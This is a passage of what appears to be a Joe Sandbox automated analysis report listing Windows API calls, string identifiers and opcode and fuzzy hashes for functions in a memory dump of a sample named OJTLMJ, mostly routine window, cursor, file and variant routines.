                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                • API String ID: 3974292440-719923060
                                                                                                                • Opcode ID: 6b4d845c72547f4839ccac1593d91886a82ee5ae6f4de72baadef4b054c9a535
                                                                                                                • Instruction ID: 628998d6ff233eaa33d3686ac53509ff39a91c072eae74c3b4ef0e3a1d5148dc
                                                                                                                • Opcode Fuzzy Hash: 6b4d845c72547f4839ccac1593d91886a82ee5ae6f4de72baadef4b054c9a535
                                                                                                                • Instruction Fuzzy Hash: E9A14E70214201DFCB04EF24C951A6AB7A6EF45364F18896DBD969B3D2EB30ED09CB71
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00D7DD87
                                                                                                                • __swprintf.LIBCMT ref: 00D7DE28
                                                                                                                • _wcscmp.LIBCMT ref: 00D7DE3B
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D7DE90
                                                                                                                • _wcscmp.LIBCMT ref: 00D7DECC
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00D7DF03
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00D7DF55
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00D7DF8B
                                                                                                                • GetParent.USER32(?), ref: 00D7DFA9
                                                                                                                • ScreenToClient.USER32(00000000), ref: 00D7DFB0
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00D7E02A
                                                                                                                • _wcscmp.LIBCMT ref: 00D7E03E
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00D7E064
                                                                                                                • _wcscmp.LIBCMT ref: 00D7E078
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 3119225716-679674701
                                                                                                                • Opcode ID: 2517d03d27e27e1456022cb931f3bd218a4bdcfa77cd704c0b26e593a5f0a6bb
                                                                                                                • Instruction ID: 157c04728b75f8ec0d6e59ef5a1811bea7ed32ce2e025756fbb1af1a3ba22fbb
                                                                                                                • Opcode Fuzzy Hash: 2517d03d27e27e1456022cb931f3bd218a4bdcfa77cd704c0b26e593a5f0a6bb
                                                                                                                • Instruction Fuzzy Hash: 70A19B71204706AFD715DF64C884FAAB7A9FF48350F048629F99EC6290EB70E945CBB1
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 00D7E6E1
                                                                                                                • _wcscmp.LIBCMT ref: 00D7E6F2
                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 00D7E71A
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00D7E737
                                                                                                                • _wcscmp.LIBCMT ref: 00D7E755
                                                                                                                • _wcsstr.LIBCMT ref: 00D7E766
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00D7E79E
                                                                                                                • _wcscmp.LIBCMT ref: 00D7E7AE
                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 00D7E7D5
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00D7E81E
                                                                                                                • _wcscmp.LIBCMT ref: 00D7E82E
                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 00D7E856
                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 00D7E8BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                • Opcode ID: a97c447db58b2b707bc224ae638a8b3f86d7389f4f313e56d981f420eccc153e
                                                                                                                • Instruction ID: ec15acb1175323c48b296f91b6ba381f80853c588418a0593eb317cab36f3642
                                                                                                                • Opcode Fuzzy Hash: a97c447db58b2b707bc224ae638a8b3f86d7389f4f313e56d981f420eccc153e
                                                                                                                • Instruction Fuzzy Hash: 8881913100430A9BDB15DF14C885FAA7BD8FF88714F1885AAFD899A196EB30DD45CBB1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                • Opcode ID: 431f16f52affc4b434f27b4c3de417e0d5a2c1da7a49e3168af65d4d247fe2c7
                                                                                                                • Instruction ID: 8b7e5270e5b8d7dd67a900c104e1e1f4e5769a1cce7c9e5917eb0556f5ef4c8d
                                                                                                                • Opcode Fuzzy Hash: 431f16f52affc4b434f27b4c3de417e0d5a2c1da7a49e3168af65d4d247fe2c7
                                                                                                                • Instruction Fuzzy Hash: 9831AD31A4420DABDB14EB50DD53EBE73A49F29704F208564F645B10D6FFA1AF08CA71
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000063), ref: 00D7F8AB
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D7F8BD
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00D7F8D4
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00D7F8E9
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00D7F8EF
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00D7F8FF
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00D7F905
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D7F926
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D7F940
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00D7F949
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00D7F9B4
                                                                                                                • GetDesktopWindow.USER32 ref: 00D7F9BA
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00D7F9C1
                                                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00D7FA0D
                                                                                                                • GetClientRect.USER32(?,?), ref: 00D7FA1A
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00D7FA3F
                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D7FA6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3869813825-0
                                                                                                                • Opcode ID: a59b48e5707edb858b6c666e008f2d492e6acfb28f8113d70a2214119285b2d5
                                                                                                                • Instruction ID: f52b0f1674929c971e18b2afc8f6ddbcc218790cf9318cc032dbc5d7ab7cb010
                                                                                                                • Opcode Fuzzy Hash: a59b48e5707edb858b6c666e008f2d492e6acfb28f8113d70a2214119285b2d5
                                                                                                                • Instruction Fuzzy Hash: 13511E7190070AAFDB209FA8CD85F6EBBF5FF04704F004529E69AE26A0D774A944CF60
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00D97F53
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00D97F5E
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00D97F69
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00D97F74
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00D97F7F
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00D97F8A
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00D97F95
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00D97FA0
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00D97FAB
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00D97FB6
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00D97FC1
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00D97FCC
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00D97FD7
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00D97FE2
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00D97FED
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00D97FF8
                                                                                                                • GetCursorInfo.USER32(?), ref: 00D98008
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 75d232d2d4076ed568546812d49aba96e7b6942dec86010440ef2d73323a0285
                                                                                                                • Instruction ID: e17a146a234b514539e5efbb67382a966ad5878a7fe50c1202bf0a888f6ef683
                                                                                                                • Opcode Fuzzy Hash: 75d232d2d4076ed568546812d49aba96e7b6942dec86010440ef2d73323a0285
                                                                                                                • Instruction Fuzzy Hash: 973107B1D4831AAADF109FB68C8995EBEE8FF04750F50453AE54DE7280DA78A5048FA1
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00DACD0B
                                                                                                                • DestroyWindow.USER32(00000000,?), ref: 00DACD83
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DACE04
                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DACE26
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DACE35
                                                                                                                • DestroyWindow.USER32(?), ref: 00DACE52
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D40000,00000000), ref: 00DACE85
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DACEA4
                                                                                                                • GetDesktopWindow.USER32 ref: 00DACEB9
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00DACEC0
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DACED2
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DACEEA
                                                                                                                  • Part of subcall function 00D5B155: GetWindowLongW.USER32(?,000000EB), ref: 00D5B166
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                • API String ID: 1297703922-3619404913
                                                                                                                • Opcode ID: 97019f0d5be723eac2dc245daddc1d54e8428cdfe37e349e0cbb091515171f7b
                                                                                                                • Instruction ID: befcc818cd07dd498922cda1e8e8d33df2433553a7b2f9424b532fa9536c82ed
                                                                                                                • Opcode Fuzzy Hash: 97019f0d5be723eac2dc245daddc1d54e8428cdfe37e349e0cbb091515171f7b
                                                                                                                • Instruction Fuzzy Hash: 8371DD7115030AAFD724CF28CC45FA63BE5EB89714F48452CF9859B2A1C731EA45CB71
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00DAF14B
                                                                                                                  • Part of subcall function 00DAD5EE: ClientToScreen.USER32(?,?), ref: 00DAD617
                                                                                                                  • Part of subcall function 00DAD5EE: GetWindowRect.USER32(?,?), ref: 00DAD68D
                                                                                                                  • Part of subcall function 00DAD5EE: PtInRect.USER32(?,?,00DAEB2C), ref: 00DAD69D
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00DAF1B4
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DAF1BF
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DAF1E2
                                                                                                                • _wcscat.LIBCMT ref: 00DAF212
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DAF229
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00DAF242
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00DAF259
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00DAF27B
                                                                                                                • DragFinish.SHELL32(?), ref: 00DAF282
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DAF36D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 169749273-3440237614
                                                                                                                • Opcode ID: 3ac57c6105ec0d1c4e8a4cbb2bbecae0c1e050c1f32324d3f80673980f1e4bbe
                                                                                                                • Instruction ID: 6bb75ddefb1e9a6858f32df7e6208d70f8da8cbac02fd22b0c5704140b03925f
                                                                                                                • Opcode Fuzzy Hash: 3ac57c6105ec0d1c4e8a4cbb2bbecae0c1e050c1f32324d3f80673980f1e4bbe
                                                                                                                • Instruction Fuzzy Hash: 5D615A71108305AFC700EFA0DC85E9BBBE9FF89754F004A2DF695921A1DB309A49CB72
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00D8B46D
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00D8B476
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D8B482
                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00D8B561
                                                                                                                • __swprintf.LIBCMT ref: 00D8B591
                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00D8B5BD
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00D8B63F
                                                                                                                • SysFreeString.OLEAUT32(00000016), ref: 00D8B6D1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D8B727
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00D8B736
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00D8B772
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                • API String ID: 3730832054-3931177956
                                                                                                                • Opcode ID: 96385748377c9904cf851d24d90bd6132d21fa37a04114466283a5fca286e48d
                                                                                                                • Instruction ID: 85a3405a743942c3685d50e96b326f8bf608dfb2e2a7319a077b213628763ba0
                                                                                                                • Opcode Fuzzy Hash: 96385748377c9904cf851d24d90bd6132d21fa37a04114466283a5fca286e48d
                                                                                                                • Instruction Fuzzy Hash: E7C10131A04616EBCB10EF69C886B7AB7B4FF05320F188466E445DB692DB74EC44DBB0
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00DA6FF9
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DA7044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                • Opcode ID: 6003b0c9e546c21ad4a13aed03ded9e33a9ce6a0fa118b5acf78ac49829ab052
                                                                                                                • Instruction ID: c4ea4b8b3eea53bf37f529917032a392344a29441f05c441b6c2a6ada23d55f6
                                                                                                                • Opcode Fuzzy Hash: 6003b0c9e546c21ad4a13aed03ded9e33a9ce6a0fa118b5acf78ac49829ab052
                                                                                                                • Instruction Fuzzy Hash: 27915F742087019FCB14EF14C851A6EB7A2EF95354F048869FC965B392DB31ED4ACBB1
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DAE3BB
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00DA9615,?), ref: 00DAE417
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DAE457
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DAE49C
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DAE4D3
                                                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,00DA9615,?), ref: 00DAE4DF
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DAE4EF
                                                                                                                • DestroyIcon.USER32(?), ref: 00DAE4FE
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DAE51B
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DAE527
                                                                                                                  • Part of subcall function 00D61BC7: __wcsicmp_l.LIBCMT ref: 00D61C50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 1212759294-1154884017
                                                                                                                • Opcode ID: fcd80cd2eeb81bc745bf6f1d6613dde960e6375a9bc0dd84e0aed42ade18efb4
                                                                                                                • Instruction ID: 6d4630aa244b61d5ea76fbd564829ee4fab117517b0e235f4db711b4e39c3c8d
                                                                                                                • Opcode Fuzzy Hash: fcd80cd2eeb81bc745bf6f1d6613dde960e6375a9bc0dd84e0aed42ade18efb4
                                                                                                                • Instruction Fuzzy Hash: FE61BB7150061ABFEB14DB64CC86FAA77ACAB0A710F148215F915E71D1EBB4D980CBB0
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00D90EFF
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D90F0F
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D90F1B
                                                                                                                • __wsplitpath.LIBCMT ref: 00D90F79
                                                                                                                • _wcscat.LIBCMT ref: 00D90F91
                                                                                                                • _wcscat.LIBCMT ref: 00D90FA3
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00D90FB8
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D90FCC
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D90FFE
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D9101F
                                                                                                                • _wcscpy.LIBCMT ref: 00D9102B
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D9106A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 3566783562-438819550
                                                                                                                • Opcode ID: b5c599b9ac280b48d87e795da2397a57c7a4d654bcbcef9b01235302c1299c2c
                                                                                                                • Instruction ID: a1f00a7f6c2fd038cce712cf1b923968093230bd36df45956c8baead7a5983c8
                                                                                                                • Opcode Fuzzy Hash: b5c599b9ac280b48d87e795da2397a57c7a4d654bcbcef9b01235302c1299c2c
